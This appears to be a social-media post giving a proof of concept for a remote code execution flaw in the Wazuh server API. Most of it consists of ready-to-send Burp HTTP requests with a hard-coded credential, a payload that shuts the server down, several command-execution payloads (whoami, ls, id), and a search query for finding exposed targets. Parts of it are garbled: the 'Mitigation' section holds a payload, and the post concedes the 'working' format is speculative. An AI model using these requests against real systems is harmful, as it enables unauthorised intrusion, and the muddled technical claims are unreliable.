
A critical RCE vulnerability has been identified in the Wazuh server due to unsafe deserialization in the wazuh-manager package. This bug affects Wazuh versions ≥ 4.4.0 and has been patched in version 4.9.1.
🚨 Wazuh Remote Code Execution (RCE) - PoC
A critical RCE vulnerability has been identified in the Wazuh server due to unsafe deserialization in the wazuh-manager package. This bug affects Wazuh versions ≥ 4.4.0 and has been patched in version 4.9.1.
🔍 Details
The flaw lies in the Wazuh API's DistributedAPI, where user-controlled input is unsafely deserialized. This allows attackers with API access (e.g., compromised dashboard or cluster node) to execute arbitrary Python code on the master server using the run_as endpoint.
📬 Proof of Concept (Burp Request)
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==
Content-Type: application/json
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}
📌 The Authorization header is the base64 of wazuh-wui:MyS3cr37P450r.*-.
📌 The payload causes the Wazuh server to shut down by calling Python's exit() method.
💥 Impact
🛡️ Mitigation
{
"__unhandled_exc__": {
"__class__": "os",
"__import__": "os",
"system": "whoami"
}
}
But this alone won’t work unless the deserialization code actually executes the object tree. Instead, use a __reduce__ based object that executes code.
Here’s the working format for a Burp request using Python’s os.system() via pickle-like logic:
💣 Working Burp RCE Payload (Python Code Execution)
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==
Content-Type: application/json
{
"__reduce__": [
"__import__('os').system",
["whoami"]
]
}
🧬 To run ls, change payload:
{
"__reduce__": [
"__import__('os').system",
["ls -la"]
]
}
You can also use:
{
"__reduce__": [
"__import__('subprocess').getoutput",
["id"]
]
}
⚠️ Note: The actual deserialization must happen with eval() or similar mechanisms in the backend for this to work. Based on the Wazuh PoC, this is indeed possible if you control auth_context.
🔐 Pro Tip Intercept the request in Burp, go to the Repeater tab, and test multiple payloads like:
"whoami""id""uname -a""ls /home/wazuh"👇Query
product.name="Wazuh"app="Wazuh"If the response is empty or status is 500, check logs — sometimes output isn’t returned. 📚 Stay sharp, hackers! More bug bounty PoCs, bypasses, and payloads are coming!
Follow 👉 @cybersecplayground for daily hacking content!
#bugbounty #rce #wazuh #infosec #security #pentest #zeroday #exploit